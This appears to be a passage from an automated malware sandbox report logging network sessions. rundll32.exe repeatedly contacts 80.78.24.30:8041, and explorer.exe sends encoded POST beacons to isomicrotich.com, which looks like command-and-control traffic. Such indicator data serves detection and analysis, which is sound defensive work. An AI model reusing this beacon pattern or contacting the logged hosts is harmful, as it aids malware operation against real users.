                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                59192.168.2.76231180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:02.070079088 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                60192.168.2.76231680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.887322903 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                61192.168.2.76231780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.548466921 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                62192.168.2.76232280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.272783995 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                63192.168.2.76232480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.942415953 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                64192.168.2.76232780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.632467985 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                65192.168.2.76232880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.260365009 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                66192.168.2.76233380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.998990059 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                67192.168.2.76233580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.654916048 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                68192.168.2.76234280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:25.806838989 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                69192.168.2.76234380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:26.433576107 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                70192.168.2.76236080.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:38.188056946 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                71192.168.2.76236180.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:38.890630960 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                72192.168.2.76236780.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:44.615331888 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                73192.168.2.76236980.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:45.236043930 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                74192.168.2.76237480.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:50.138189077 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                75192.168.2.76237680.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:50.765396118 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                76192.168.2.76238280.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:55.527996063 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                77192.168.2.76238480.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:56.158086061 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                78192.168.2.76238880.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:59.966016054 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                79192.168.2.76239080.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:00.604720116 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                80192.168.2.76239780.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.335129023 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                81192.168.2.76239880.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.002310038 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                82192.168.2.76240380.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:09.718934059 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                83192.168.2.76240580.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:10.363353014 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                84192.168.2.76241180.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427480936 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                85192.168.2.76241380.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074749947 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                86192.168.2.76241880.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.748904943 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                87192.168.2.76241980.78.24.308041
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.386271954 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.762255188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:23 UTC422OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 92
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:23 UTC92OUTData Raw: 31 51 44 56 39 33 6c 49 59 36 59 33 35 2f 69 57 77 44 6f 65 6b 61 43 36 6b 61 43 41 69 7a 4e 79 5a 51 78 76 35 61 52 59 74 4d 4e 45 34 73 65 48 50 58 52 62 71 44 7a 6f 4a 52 70 6f 48 76 7a 37 56 5a 4b 6d 4e 44 79 65 41 6a 70 44 4c 30 49 47 51 4a 7a 4e 57 52 56 48 7a 56 45 3d
                                                                                                                                                                                                                                                Data Ascii: 1QDV93lIY6Y35/iWwDoekaC6kaCAizNyZQxv5aRYtMNE4seHPXRbqDzoJRpoHvz7VZKmNDyeAjpDL0IGQJzNWRVHzVE=
                                                                                                                                                                                                                                                2024-10-03 18:46:24 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IRBfL%2FWCKYcKQJSkfdXZub6pXesrcbLQhvw%2BvzPhzlqe7jB15vYsGi4Y2EmNktvU%2FnE6%2FbMKkUhurIJQPwCHYUpuiCZnwngwp1jZY21aLW6hqynkf7RJ%2BtJckDsYqpe7oQc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf183e8c79423f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.762257188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:25 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:26 UTC556INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMIj7w2nlAfm%2BruvGC3UGXMbHtKCC%2Bfuo%2FDH1syeDLBM5BKk%2B6JhtYW50mmEmWqq1RpGZK%2BZogoSXsaRm7C%2FqAeKs%2F1fN0xLFD%2BPcP1gwsqS%2B4Tx5odWma2%2BaIlvB4XeAm9f"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf184aa90e32f4-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.762258188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:26 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:27 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:27 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpnOj2jFvFabvZcNba6gtPJSdTIAiQgKPxXKjG7snmm99kyYcupNSGDOa2iqXnEs26%2F9yd9kapQsWaPNz%2B3ompoDMkWktSNgcy8j7qWQZgp9enc2obZVC5UdE0BUBwXjzqM6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1851cda37cb1-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.762259188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:27 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:28 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHIwFDoUQFR55LozEWSxyTN1wCAgJdnorpkaI%2FUIII6LPRXQhRMLsQsHxVoW4G1A3XxMkqDnLbyc%2Baf5c7PxcA2Px13Il4tKy5xXGI1gfIOAlKWUxDHg1Vyzgi8gkIGDjKgh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18584efc19aa-EWR
                                                                                                                                                                                                                                                2024-10-03 18:46:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.762261188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:46:28 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:46:29 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
